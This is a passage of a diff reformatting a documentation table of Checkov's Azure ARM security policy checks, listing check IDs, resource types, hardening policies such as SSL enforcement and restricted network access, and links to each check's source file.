'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 39 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | 
[PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 40 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 41 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 42 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | arm | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | -| 43 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 44 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 45 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for 
blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 46 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | arm | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py) | -| 47 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | arm | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py) | -| 48 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | arm | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | -| 49 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | arm | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | -| 50 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | arm | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | -| 51 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | arm | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | -| 52 | CKV_AZURE_41 | resource | 
Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | arm | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | -| 53 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | arm | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | -| 54 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | arm | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | -| 55 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | arm | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | -| 56 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | arm | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | -| 57 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | arm | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 58 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | arm | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | -| 59 | CKV_AZURE_63 | resource | 
Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | arm | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | -| 60 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | arm | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | -| 61 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | arm | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | -| 62 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | arm | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | -| 63 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | arm | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | -| 64 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | arm | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | -| 65 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | -| 66 | CKV_AZURE_94 
| resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | arm | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | -| 67 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | arm | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | -| 68 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | arm | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | -| 69 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 70 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 71 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | arm | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | -| 72 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | arm | 
[CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | -| 73 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | arm | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | -| 74 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | arm | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | -| 75 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | arm | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | -| 76 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | arm | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | -| 77 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | arm | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | -| 78 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | arm | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | -| 79 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | arm | 
[SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | -| 80 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | arm | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | -| 81 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | arm | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | -| 82 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | arm | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | -| 83 | CKV_AZURE_131 | parameter | secureString | SecureString parameter should not have hardcoded default values | arm | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py) | -| 84 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | arm | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | -| 85 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | arm | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | -| 86 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that 
Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 87 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 88 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | arm | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | -| 89 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 90 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 91 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | arm | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | -| 92 | CKV_AZURE_236 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | arm | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | -| 93 | CKV2_AZURE_23 | resource | 
Microsoft.AppPlatform/Spring | Ensure Azure spring cloud is configured with Virtual network (Vnet) | arm | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml) | -| 94 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | arm | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| | Id | Type | Entity | Policy | IaC | Resource Link | +|-----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| 0 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | arm | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | +| 1 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | arm | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | +| 2 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | arm | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py) | +| 3 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | arm | 
[AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | +| 4 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | arm | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | +| 5 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | arm | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | +| 6 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | arm | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | +| 7 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | arm | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | +| 8 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 9 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 10 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | arm | 
[NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 11 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 12 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | arm | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | +| 13 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 14 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 15 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 16 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 17 | 
CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 18 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 19 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | arm | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | +| 20 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | arm | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | +| 21 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | arm | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | +| 22 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | arm | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | +| 23 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | arm | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | +| 24 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | arm | 
[SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | +| 25 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | arm | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | +| 26 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | +| 27 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | +| 28 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | +| 29 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | +| 30 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | arm | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | +| 31 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is 
set to 'All' | arm | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) |
+| 32 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | arm | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) |
+| 33 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | arm | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) |
+| 34 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | arm | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) |
+| 35 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | arm | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) |
+| 36 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) |
+| 37 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | 
[PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) |
+| 38 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) |
+| 39 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) |
+| 40 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) |
+| 41 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) |
+| 42 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | arm | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) |
+| 43 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 
'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) |
+| 44 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) |
+| 45 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) |
+| 46 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | arm | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py) |
